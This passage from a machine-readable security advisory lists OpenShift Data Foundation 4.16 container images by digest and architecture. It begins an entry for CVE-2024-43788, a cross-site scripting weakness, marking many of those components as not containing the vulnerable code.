"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", 